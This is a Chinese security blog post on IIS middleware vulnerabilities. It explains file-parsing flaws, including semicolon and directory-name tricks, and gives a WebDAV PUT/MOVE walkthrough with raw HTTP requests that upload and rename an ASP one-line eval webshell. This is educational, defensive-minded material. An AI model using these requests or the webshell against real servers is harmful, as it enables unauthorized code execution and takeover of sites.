中间件安全-IIS篇


前言

IIS是一种Web(网页)服务组件,其中包bai括Web服务器、FTP服务器、NNTP服务器和SMTP服务器,分别用于网页浏览、文件传输、新闻服务和邮件发送等方面,它使得在网络(包括互联网和局域网)上发布信息成了一件很容易的事。

解析漏洞

IIS 5.X/6.0文件解析漏洞

目录解析漏洞

在网站下建立文件夹的名字为xx.asp,xx.asa的文件夹,其目录内的任何扩展名的文件都被 IIS 当作 asp 文件来解析并执行。用burp改上传路径为,upload/1.asp/1.jpg。

畸形文件解析漏洞

例如文件shell.asp;.jpg 在IIS 6.0中,这种畸形文件,分号 “;” 后边的内容不会被解析,所以最后执行的是shell.asp

并且在IIS中默认可以执行的文件除了asp文件还有*.asa *.cer *.cdx

IIS7&IIS 7.5解析漏洞

该漏洞要在Fast-CGI运行模式下才会被触发,这个漏洞其实和nginx那个解析漏洞原理一样利用方式也是一样。在一个文件访问一个1.jpg文件。在访问的后面加上/xx.php就会解析成为php文件。

CVE-2017-7269 IIS6.0远程代码执行漏洞

IIS PUT写漏洞

影响版本:6.0、7.0、7.5,服务器开启了webdav的组件。

测试我们服务器发送OPTIONS请求包:

OPTIONS / HTTP/1.1

Host: www.test.com
......
......

如果返回结果如下:

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL: <DAV:sql>
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
Cache-Control: private

当ALLOW中包含如上方法时,可以确定服务器开启了WebDAV.

这时候我们还不能直接上传可执行脚本,先使用PUT方法上传一个txt文件然后在使用MOVE方法进行修改,当然你得有写入权限:

PUT /test.txt HTTP/1.1
Host: www.test.com
Content-Length: 23

<%eval request("a")%>

在使用MOVE方法:

MOVE /test.txt HTTP/1.1

Host: www.test.com

Destination: http://www.test.com/test.asp

文章作者: EASY
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 EASY !
 上一篇
中间件安全-jboss篇 中间件安全-jboss篇
前言JBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支
2020-08-06 EASY
下一篇 
中间件安全-tomacat篇 中间件安全-tomacat篇
前言Tomcat 是一个开源的轻量级Web 应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。 实际上Tomcat是Apache 服务器的扩展,但运行时它是独立运行的,所以当运行tomcat
2020-08-05 EASY
  目录